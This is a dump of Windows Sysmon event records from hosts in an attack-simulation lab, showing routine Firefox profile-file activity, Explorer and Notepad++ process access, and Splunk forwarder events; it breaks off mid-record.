23542300x8000000000000000284593Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.719{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\xulstore.jsonMD5=C0AA4F6F7078705CF225CC9703918D17,SHA256=C27A69EBDC4BF33CDA12D758E155B64789F68B2FB69C33694314A7BD7096330A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284592Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.719{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284591Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.719{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\favicons.sqlite-walMD5=DCA86FF68E85D8F8DA92415B6B773A45,SHA256=FA4A1EF2B7020A639EB1ABAB208BA02F37EF7678E8570EFA7391F193EBB51480,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284590Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.704{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\favicons.sqlite-shmMD5=1033E1498707219F197623C123FDD7B5,SHA256=7EB6D6BE30DFDCACC17157C40052B80F96580AF770C5E0DAB07011C7A1615879,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284589Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.704{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\places.sqlite-walMD5=6F61353C5EE0409F30B6060E76D164A7,SHA256=8FF922243F76EC40526E716109CA776DBAFCD0C119E5EF207F4F547D3E014952,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284588Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.682{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\places.sqlite-shmMD5=031633A3C890A5CB129F2392827367F8,SHA256=C54561CA2E757C1E8DCA0AF8B8BE7E43BB5113E60CDCE839A2B2A240E8EAC72A,IMPHASH=00000000000000000000000000000000falsetrue 17141700x8000000000000000284587Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:33:47.650{C8EA50B7-0169-6216-B402-000000003802}4248\chrome.4248.27.10774680C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000284586Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:33:47.650{C8EA50B7-0169-6216-B402-000000003802}4248\chrome.4248.26.61084029C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000284585Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:33:47.650{C8EA50B7-0169-6216-B402-000000003802}4248\chrome.4248.25.59240354C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000284584Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:33:47.650{C8EA50B7-0169-6216-B402-000000003802}4248\chrome.4248.24.118981635C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000284583Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.635{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cookies.sqlite-walMD5=007A4FE2F1859938790B71050EE83E01,SHA256=E36EEB47D52C48FD9AEDDE3FCD018C77429DA7639B53CC1B25D289EE32524DE5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284582Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.619{C8EA50B7-0169-6216-B402-000000003802}42485616C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-018A-6216-C502-000000003802}4360C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2bd60|C:\Program Files\Mozilla Firefox\xul.dll+e38a9d|C:\Program Files\Mozilla Firefox\xul.dll+e32cb9|C:\Program Files\Mozilla Firefox\xul.dll+e28dfc|C:\Program Files\Mozilla Firefox\xul.dll+1f97402|C:\Program Files\Mozilla Firefox\xul.dll+1a149ae|C:\Program Files\Mozilla Firefox\xul.dll+1a160f2|C:\Program Files\Mozilla Firefox\xul.dll+1bde499|C:\Program Files\Mozilla Firefox\xul.dll+179ae0c|C:\Program Files\Mozilla Firefox\xul.dll+129873|C:\Program Files\Mozilla Firefox\xul.dll+126c0cc|C:\Program Files\Mozilla Firefox\xul.dll+1be862b|C:\Program Files\Mozilla Firefox\xul.dll+1bdeaf8|C:\Program Files\Mozilla Firefox\xul.dll+179ae0c|C:\Program Files\Mozilla Firefox\xul.dll+1749117|UNKNOWN(000001D1D5751E54) 10341000x8000000000000000284581Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.619{C8EA50B7-0169-6216-B402-000000003802}42485616C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-0175-6216-C002-000000003802}5104C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2bd60|C:\Program Files\Mozilla Firefox\xul.dll+e38a9d|C:\Program Files\Mozilla Firefox\xul.dll+e32cb9|C:\Program Files\Mozilla Firefox\xul.dll+e28dfc|C:\Program Files\Mozilla Firefox\xul.dll+1f97402|C:\Program Files\Mozilla Firefox\xul.dll+1a149ae|C:\Program Files\Mozilla Firefox\xul.dll+1a160f2|C:\Program Files\Mozilla Firefox\xul.dll+1bde499|C:\Program Files\Mozilla Firefox\xul.dll+179ae0c|C:\Program Files\Mozilla Firefox\xul.dll+129873|C:\Program Files\Mozilla Firefox\xul.dll+126c0cc|C:\Program Files\Mozilla Firefox\xul.dll+1be862b|C:\Program Files\Mozilla Firefox\xul.dll+1bdeaf8|C:\Program Files\Mozilla Firefox\xul.dll+179ae0c|C:\Program Files\Mozilla Firefox\xul.dll+1749117|UNKNOWN(000001D1D5751E54) 10341000x8000000000000000284580Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.619{C8EA50B7-0169-6216-B402-000000003802}42485616C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-0174-6216-BF02-000000003802}3332C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2bd60|C:\Program Files\Mozilla Firefox\xul.dll+e38a9d|C:\Program Files\Mozilla Firefox\xul.dll+e32cb9|C:\Program Files\Mozilla Firefox\xul.dll+e28dfc|C:\Program Files\Mozilla Firefox\xul.dll+1f97402|C:\Program Files\Mozilla Firefox\xul.dll+1a149ae|C:\Program Files\Mozilla Firefox\xul.dll+1a160f2|C:\Program Files\Mozilla Firefox\xul.dll+1bde499|C:\Program Files\Mozilla Firefox\xul.dll+179ae0c|C:\Program Files\Mozilla Firefox\xul.dll+129873|C:\Program Files\Mozilla Firefox\xul.dll+126c0cc|C:\Program Files\Mozilla Firefox\xul.dll+1be862b|C:\Program Files\Mozilla Firefox\xul.dll+1bdeaf8|C:\Program Files\Mozilla Firefox\xul.dll+179ae0c|C:\Program Files\Mozilla Firefox\xul.dll+1749117|UNKNOWN(000001D1D5751E54) 23542300x8000000000000000284579Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.619{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cookies.sqlite-shmMD5=8AFDC709E073C996DDE9813C4964F305,SHA256=92770B7CFF0D6AF92CC6F7AAE2A1861A841FF63FAA8DE72C3FE8891E71942210,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284578Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.619{C8EA50B7-0169-6216-B402-000000003802}42485616C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-016A-6216-B702-000000003802}1800C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2bd60|C:\Program Files\Mozilla Firefox\xul.dll+e38a9d|C:\Program Files\Mozilla Firefox\xul.dll+e32cb9|C:\Program Files\Mozilla Firefox\xul.dll+e28dfc|C:\Program Files\Mozilla Firefox\xul.dll+1f97402|C:\Program Files\Mozilla Firefox\xul.dll+1a149ae|C:\Program Files\Mozilla Firefox\xul.dll+1a160f2|C:\Program Files\Mozilla Firefox\xul.dll+1bde499|C:\Program Files\Mozilla Firefox\xul.dll+179ae0c|C:\Program Files\Mozilla Firefox\xul.dll+129873|C:\Program Files\Mozilla Firefox\xul.dll+126c0cc|C:\Program Files\Mozilla Firefox\xul.dll+1be862b|C:\Program Files\Mozilla Firefox\xul.dll+1bdeaf8|C:\Program Files\Mozilla Firefox\xul.dll+179ae0c|C:\Program Files\Mozilla Firefox\xul.dll+1749117|UNKNOWN(000001D1D5751E54) 11241100x8000000000000000284577Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.619{C8EA50B7-0169-6216-B402-000000003802}4248C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\SiteSecurityServiceState.txt2022-02-22 11:23:49.748 23542300x8000000000000000284576Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.619{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\webappsstore.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284575Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.619{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\SiteSecurityServiceState.txtMD5=DFAF67DAB625DDFE875EEB684D6DCEA5,SHA256=BF72D23ABF4C5791D620A82A961015B42B05BB47FA92B116B4356A44F3F2918B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284574Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.603{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284573Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.582{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-0169-6216-B402-000000003802}4248C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x8000000000000000284572Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:33:47.582{C8EA50B7-0169-6216-B402-000000003802}4248\chrome.4248.23.34576852C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000284571Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:33:47.566{C8EA50B7-0169-6216-B402-000000003802}4248\chrome.4248.22.57848119C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000284570Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.566{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\sessionstore-backups\recovery.jsonlz4MD5=F4AD3687A0E1A9F87CECC38268B77689,SHA256=45B20C6622535B7A2AAA292680172E098BCC5D245B7C6A5C91DFF4AFE43DDFEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284569Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.566{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\sessionstore-backups\recovery.baklz4MD5=AC30B39212B38CAA30C47558287D4CA8,SHA256=DC2142694DDCD4E84B6708A81E41E8FF3E5B9C0C300266283816A3549B19A711,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284568Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.535{C8EA50B7-0169-6216-B402-000000003802}42485616C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-0171-6216-BE02-000000003802}5264C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2bd60|C:\Program Files\Mozilla Firefox\xul.dll+e38a9d|C:\Program Files\Mozilla Firefox\xul.dll+e38528|C:\Program Files\Mozilla Firefox\xul.dll+840734|C:\Program Files\Mozilla Firefox\xul.dll+834311|C:\Program Files\Mozilla Firefox\xul.dll+19c76f6|C:\Program Files\Mozilla Firefox\xul.dll+19c6153|C:\Program Files\Mozilla Firefox\xul.dll+168ec17|C:\Program Files\Mozilla Firefox\xul.dll+1f97402|C:\Program Files\Mozilla Firefox\xul.dll+1a149ae|C:\Program Files\Mozilla Firefox\xul.dll+1a160f2|UNKNOWN(000001D1D5772FAA) 10341000x8000000000000000284567Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.519{C8EA50B7-0169-6216-B402-000000003802}42485616C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-016A-6216-B702-000000003802}1800C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2bd60|C:\Program Files\Mozilla Firefox\xul.dll+e38a9d|C:\Program Files\Mozilla Firefox\xul.dll+e38528|C:\Program Files\Mozilla Firefox\xul.dll+840734|C:\Program Files\Mozilla Firefox\xul.dll+834311|C:\Program Files\Mozilla Firefox\xul.dll+19c76f6|C:\Program Files\Mozilla Firefox\xul.dll+19c6153|C:\Program Files\Mozilla Firefox\xul.dll+168ec17|C:\Program Files\Mozilla Firefox\xul.dll+1f97402|C:\Program Files\Mozilla Firefox\xul.dll+1a149ae|C:\Program Files\Mozilla Firefox\xul.dll+1a160f2|UNKNOWN(000001D1D5772FAA) 10341000x8000000000000000284566Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.419{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284565Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.419{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284564Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.419{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284563Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.403{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284562Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.403{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284561Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.403{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284560Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.403{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000284559Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.150{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E213DB1E63BBB5B73B83737A63A516E,SHA256=A177A502595D5CC551F178514F5C579E8C7BD92D6FA4E3B554AFE7BC00857B08,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213674Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.039{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51138-false10.0.1.12-8089- 23542300x8000000000000000213705Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:48.555{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9007C5B4EF97C0ACC31BDE30B373DB66,SHA256=04A01841278B26068CABE3637FF72D563D5151AA96CB54471B4F826C83611B12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284630Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:48.972{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=147BF6AED78C90D4E8729782945B89A2,SHA256=4014BD6EA7EC1755A05C5079ABEFA9A3CFDC1FF52AD643FD05FFEF4B5D667E2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284629Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:48.972{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=FDEE84B7B4903F583BE8368BC20B2BE8,SHA256=A38E570B807ACE277043BF35EDFFDA978C57FA07A211BF4AD8653937634DE931,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284628Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:48.816{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E1FD42EABDC9CBFA38D9DCC5F2EC54E5,SHA256=DDE8C407FBD46C41EB061EACDC81D5F66C1A111546FC5484330C41CBB85FE8EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284627Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:48.816{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1467D21D6FC55E3855EA46B70B0CF364,SHA256=4F5BDBBF3B2B8BF16A150706B7979B7A78ED9B0D3F8F777525EE636E0DBA4043,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284626Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:48.457{C8EA50B7-0D8B-6216-8E04-000000003802}2268ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\pingsender.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\saved-telemetry-pings\7a931ddd-ad59-42aa-8f07-8e0b9ff26739MD5=03FC511A460342CD4DEFA581F767DF39,SHA256=2C27BC12A0779B892912C7A11C7BA1EEB29E7F5926F963BE674214512220BAC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284625Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:48.238{C8EA50B7-0D8B-6216-8E04-000000003802}2268ATTACKRANGE\AdministratorC:\Program Files\Mozilla 